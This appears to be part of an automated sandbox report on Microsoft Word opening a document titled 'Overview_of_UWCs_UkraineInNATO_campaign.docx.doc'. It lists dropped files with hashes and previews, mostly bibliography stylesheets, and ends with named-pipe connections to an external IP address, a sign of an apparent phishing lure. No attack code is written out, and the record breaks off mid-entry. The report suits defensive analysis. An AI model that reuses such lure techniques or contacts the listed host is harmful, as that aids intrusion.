                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):251449
                                                                                                                                          Entropy (8bit):5.103599476769172
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:hwprA3R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:XA
                                                                                                                                          MD5:234430F3D3032B9648671D3DF168D827
                                                                                                                                          SHA1:4B7606E1F7E8172EE74DE90EE4CA75E3F44A0A2B
                                                                                                                                          SHA-256:DC7160C2FE5939E82BFEEE180C1DA8176C4914C034CAE8938ED6C9F7A9144F3E
                                                                                                                                          SHA-512:943119B65B2017F8FAAD5EC6B490CC8E263EC6128DD3D274A54EFB826FBE4353C72D335F5708974F1624E9BAE971C9D112905638B3F2123FC384DB201DE5B26C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):284802
                                                                                                                                          Entropy (8bit):5.006325058456308
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:B9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:G
                                                                                                                                          MD5:08AD981C6D9BFD066BF29A77A62F0FEA
                                                                                                                                          SHA1:DBE60C2A2BC9A80EFBD6BE114BDF1416261C94E6
                                                                                                                                          SHA-256:BCFB2EF3D37F7DAFCB9FF4D92885C5F87B4BEC7A3045BC7208460DAE7DABAE31
                                                                                                                                          SHA-512:64A939705679AA9EBD66634059A63BE280DF197845F23334906EF419C891E1393700344EE8D200195B72509874AD6046495815B94C1BF998116C351BC483C6EB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):294525
                                                                                                                                          Entropy (8bit):4.978414555953716
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:ndkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:Y
                                                                                                                                          MD5:96F3CCC20E23824F1904EDFDFE5CDA02
                                                                                                                                          SHA1:EF78E9B415A9FFD4094E525509D3AEB3E2A68EEE
                                                                                                                                          SHA-256:9970654851826C920261D52F8536B1305F7E582C7A2E892BAC344A95F909FE63
                                                                                                                                          SHA-512:1022D3E990B1A31361C9658C6C15DB9B41DA38E73319C93C62EE8E57E36333261F66897E1F0F6502EC28B780A9FC434E7F548178F3BC1D4463A44BCF508604E1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):270642
                                                                                                                                          Entropy (8bit):5.074829646335759
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:JwprAi5R95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:WL
                                                                                                                                          MD5:831E5489F3047AFF2EFDFF758FA42FEC
                                                                                                                                          SHA1:F27C9E96D726464E802AD007FE749B8F27FF4525
                                                                                                                                          SHA-256:7914A8B4ADFDC9A6589ED181DE46D3D735676A38AA61B8FAFC0F862B9EC3A1CD
                                                                                                                                          SHA-512:B84800FAB9FDF2AEFACBFC14527BC8361459E5138309E11C1025CF61A855C481E77EF14623182F485F3122A40BA4F873E4300B8D8209D924E3E16646FA34BCB8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):217578
                                                                                                                                          Entropy (8bit):5.069961862348856
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                          MD5:7777C0173259D8F4A4F5E69C1461CA14
                                                                                                                                          SHA1:9C83B87C098AECF3CDFC1B5C4C78B696BF14A5E6
                                                                                                                                          SHA-256:A343D61BAB2F25D138BDCC57D33C4A83FD494A54EAF3DF0F539E3B51CFE011F1
                                                                                                                                          SHA-512:77BFD6F7D21AB9771DF1993FB9AB82BA6D5E900F0B846F0F11578313E8A99C99E095612510CBB07590367EADE9B31CF396B26ABA5E8380F3ABC0886FA02858B9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):255219
                                                                                                                                          Entropy (8bit):5.004117790808506
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:MwprA8niNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:x
                                                                                                                                          MD5:C9460BEAF863E337428518DAF5C09C5C
                                                                                                                                          SHA1:76BE7E80D117A73A4FFC96682345EECE9A5C4D2A
                                                                                                                                          SHA-256:A69368BE9AC843B088D739F1573007E634D1068DB0AD9937A95FE7A0690C05E0
                                                                                                                                          SHA-512:9E4A7D3E019D182CD6CFF4947364DCF435EF3B40BA004A360260EDA0712839875CB797DBFCCCD9E50885EB10AEF8695052899E4BAC16423D0EECCF025CF6B03F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):251336
                                                                                                                                          Entropy (8bit):5.057713103491112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:JwprA6sS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:u9
                                                                                                                                          MD5:DAE31FA14BC97723A87F126B5121BAE3
                                                                                                                                          SHA1:C6B5CFF442FCC8795A5AF0D69ACDA24497D9F4BE
                                                                                                                                          SHA-256:30F377F7AC24B022F52371ADA97CB057460265F4C8BDDBB521642B6E2462EE27
                                                                                                                                          SHA-512:AE6B8BB6FCF956E1973C9E40702CB1A86FD8AD6F87FA1C2D3A2113C2F8AEC2A495FE636D71786843496F37FF9DB3D2F0E034BC4014D9C379E4EA4CC9495BE907
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):344662
                                                                                                                                          Entropy (8bit):5.023256859004611
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:UwprAwnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:F
                                                                                                                                          MD5:F82561FF802442D12B8B77EC6EDC027E
                                                                                                                                          SHA1:EE7ED23C6EF8DA4968BA969FC094203D61065C0E
                                                                                                                                          SHA-256:5B7A52DFAA9C3E9E340E081178B54E827ED591AC27DC098C3985C94BDE5CABE9
                                                                                                                                          SHA-512:FA205BCD1D61226A940EA333B3B3EC43FB461E7683669A344403B543B9F699677A9E332827EC0160E81A8FBFD43CA61735A5C414EE7C17143DC9819A137044B5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\MSO1033.acl

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):37730
                                                                                                                                          Entropy (8bit):3.124503226655357
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:XatNbFeZKdogeyHMOeYhIVi+iOFOqbPXdEmanb:2/eLAhIVJb2
                                                                                                                                          MD5:4DA38001D6DEE4E1C7291AE22F197FCD
                                                                                                                                          SHA1:82F5B0774C6483A43A1E1A661A8828D560673981
                                                                                                                                          SHA-256:2ACCDCBAABD6ADFC09B582BA45F48E5EDBFF932F3DE360711D3E0A826DF51740
                                                                                                                                          SHA-512:8C4E08CE3955EE837ED7FCC7AFCC0F1F528B7721BB0CCDEE4BB7727E51C3F9464E6F0C178923EEB2C7DA83AF5BA3DF768AA7BE3149BF94A7D1C1E5D12C0A7F87
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:....,a..b.......R.....(.c.)...........(.e.)...... ....(.r.)...........(.t.m.)....."!..............& ....a.b.b.o.u.t.....a.b.o.u.t.....a.b.o.t.u.....a.b.o.u.t.....a.b.o.u.t.a.....a.b.o.u.t. .a.....a.b.o.u.t.i.t.....a.b.o.u.t. .i.t.....a.b.o.u.t.t.h.e.....a.b.o.u.t. .t.h.e.....a.b.s.c.e.n.c.e.....a.b.s.e.n.c.e.....a.c.c.e.s.o.r.i.e.s.....a.c.c.e.s.s.o.r.i.e.s.....a.c.c.i.d.a.n.t.....a.c.c.i.d.e.n.t.....a.c.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.c.o.r.d.i.n.g.t.o.....a.c.c.o.r.d.i.n.g. .t.o.....a.c.c.r.o.s.s.....a.c.r.o.s.s.....a.c.h.e.i.v.e.....a.c.h.i.e.v.e.....a.c.h.e.i.v.e.d.....a.c.h.i.e.v.e.d.....a.c.h.e.i.v.i.n.g.....a.c.h.i.e.v.i.n.g.....a.c.n.....c.a.n.....a.c.o.m.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.t.u.a.l.y.l.....a.c.t.u.a.l.l.y.....a.d.d.i.t.i.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.d.t.i.o.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.e.q.u.i.t.....a.d.e.q.u.a.t.e.....a.d.e.q.u.i.t.e.....a.d.e.q.u.a.t.e.....a.d.n.....

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:56:29 2022, mtime=Tue Jul 4 01:17:42 2023, atime=Tue Jul 4 01:17:20 2023, length=120614, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1238
                                                                                                                                          Entropy (8bit):4.794870667732745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:8t/xaUhWCHo62j2OF+WDRu7IlLMSNMBKjEjA9/E2jXzhbcla5MSNMBsD8sR8B8fS:8t/sXRGYLMSeMQA982cgMSeWDv7aB6m
                                                                                                                                          MD5:7E9D1BE414D03EEAAEBFB49F74828037
                                                                                                                                          SHA1:FE762BCB94A25468BD0F40EE4E6637BC0963F382
                                                                                                                                          SHA-256:8E3A6DC131F93F45721644EDA6864DB515C5F3F7BB0FBCBFD29F7A01CC3296B4
                                                                                                                                          SHA-512:DE44F59DF5EAEA8413A094907C067A38D47F35F438AA83F23F4690BFAF811209FD8568361F6794183D104F25CDD98DA0328FBCC58813F77741EC73FD72E037FF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F.... ...(..k...k........4.....&.......................-....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...V%.....................:.....Q...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....Z.1......U....user..B.......N...V%......S....................ui".e.n.g.i.n.e.e.r.....~.1......U....Desktop.h.......N...V%......Y..............>......Z..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.&....V+. .OVERVI~1.DOC..........U...V+......R......................-.O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.......y...............-.......x...........>.S......C:\Users\user\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc..G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.v.e.r.v.i.e.w._.o.f._.U.W.C.s._.U.k.r.a.i.n.e.I.n.N.A.T.O._.c.a.m.p.a.i.g.n...d.o.c.x...d.o.c.........:..,.LB.)...A}...`.......X.......377142...........!a..%.H.VZAj.....c2.........-$..!a..%.H

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eduardo, Template: Normal.dotm, Last Saved By: Eduardo, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Apr 13 14:11:00 2022, Last Saved Time/Date: Wed Apr 13 14:11:00 2022, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):23870
                                                                                                                                          Entropy (8bit):3.126890272974214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:zWjUlLZEvA+6/6rNavrgYjk+4bWl92zBi1RH1rGOJU:zWjo8iSwvxjk+t9+i1RH1rG3
                                                                                                                                          MD5:26A6A0C852677A193994E4A3CCC8C2EB
                                                                                                                                          SHA1:70560AFF35F1904F822E49D3316303877819EEF8
                                                                                                                                          SHA-256:07377209FE68A98E9BCA310D9749DAA4EB79558E9FC419CF0B02A9E37679038D
                                                                                                                                          SHA-512:BF35991FEC81B96EAE2CE5C90AE627DD6CF11C61C5369DC34BBBC65E24C3E1F413F475BDB8321F455E5F4B6EAA833B3D33F847C744C68AE6E853A373AD2B37AE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:......................>.........<html>........'...........)...............&......................................................................................................................................................................................................................................................................................................................................................................................................................................................=.............................bjbj..............................L..hL..h..................................................................................F.......F...............................................................................................................t...................................................................M.......O.......O.......O.......O.......O.......O...$...B...........F...s.....................................................................

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url:Zone.Identifier

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):26
                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:gAWYp:qYp
                                                                                                                                          MD5:ACC88D3264FC06AE3584A8ED90009260
                                                                                                                                          SHA1:FD63700F852BE379C417253CA869CC1C5E2F46A0
                                                                                                                                          SHA-256:E9066838A2265B9327318C602ED6954BC1A26869C19FAA255CD26A3C7CE707A7
                                                                                                                                          SHA-512:CB41EF87941B26F1CB25DB61536A6C89F3B7A3BC67B4CFBE7290DD528DACC6870A08CDC2AABAF289382A5CD7EF96C95556B05B8EAD3FB1317DFCD18B6302E456
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[ZoneTransfer]..ZoneId=1..

                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:Generic INItialization configuration [folders]
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):122
                                                                                                                                          Entropy (8bit):4.99287143244066
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:M1oADzXG97UIf4B8m1ddLFSm4AAzXG97UIf4B8m1ddLFSv:MW4X/IS8mjdLFF4X/IS8mjdLFc
                                                                                                                                          MD5:103701A2E0B21C22F308A6B6FD225D0E
                                                                                                                                          SHA1:410657E462719CEBB647324B5B1B836A547411B4
                                                                                                                                          SHA-256:AD6258A58670B0FCCB0167EA38C571F76662EF78DB4078E965959DE99A6589A0
                                                                                                                                          SHA-512:12EB7747DC1F66033A6D1BA1331D57B2FA8A19B27265795646741F71D55AF4D0B2DFD8DA8F4120914CFCB100F41B6C37513FF2ED3FE0419F05FFC809E878D1FC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[doc]..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..[folders]..Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK=0..

                                                                                                                                          C:\Users\user\Desktop\~$erview_of_UWCs_UkraineInNATO_campaign.docx.doc

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):162
                                                                                                                                          Entropy (8bit):3.014103769944679
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Rl/Zd++pIHUxePl3UPPGSnr7+Ul:RtZ0jPlkPPGSr7+8
                                                                                                                                          MD5:B17964D2D801558E3399B214376E72AC
                                                                                                                                          SHA1:E6BB00A9E58DC8BC4363B2E386B637F08ECA8E53
                                                                                                                                          SHA-256:EAFEBB1AF744D4E97F3C1D9C3ED8067F30193D35D8539EEF3A6C8588F4D7666A
                                                                                                                                          SHA-512:85E8D4BC4484A96AE391BAD57C61077AFB7FE02762356F1A784C2C51AE699FB976DD97D764FF35341B9B894B8911E00061745B82EA4CFFB1BE13D3165C892C74
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.pratesh................................................p.r.a.t.e.s.h...........H..@......"..........in........T..A......."...j......not.......P..B......."..+...

                                                                                                                                          \Device\Mup\104.234.239.26\PIPE\srvsvc

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):196
                                                                                                                                          Entropy (8bit):3.8335661211449588
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:rmHD/tH//llleYhtC4d1ydYhtq5kZtzllmVl/tllB1elHMDOJ1/y/ln:rmHurYtzKZksDQotn
                                                                                                                                          MD5:C971BCCE0A87FC0DC153BE52CE6DE3DD
                                                                                                                                          SHA1:6688165AF020ADD26EA866152AC6612812E8A884
                                                                                                                                          SHA-256:3A2441D00821E6E695322DA78B24F5FC54A88F5E85885985FED64B13814C80F5
                                                                                                                                          SHA-512:5A6E5A55BB9128AD47BC2A612E2FEA9F4632AF785D12D92962594EBC87655B6EAC08A9FDE9FECD87BC1B784B7A325C7908A7922C8A9D89B5D5FC3484A5A9E822
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:........t........................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....,..l..@E....................P.......8.......................\.\.1.0.4...2.3.4...2.3.9...2.6.....e...

                                                                                                                                          \Device\Mup\104.234.239.26\PIPE\wkssvc

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                          File Type:GLS_BINARY_LSB_FIRST
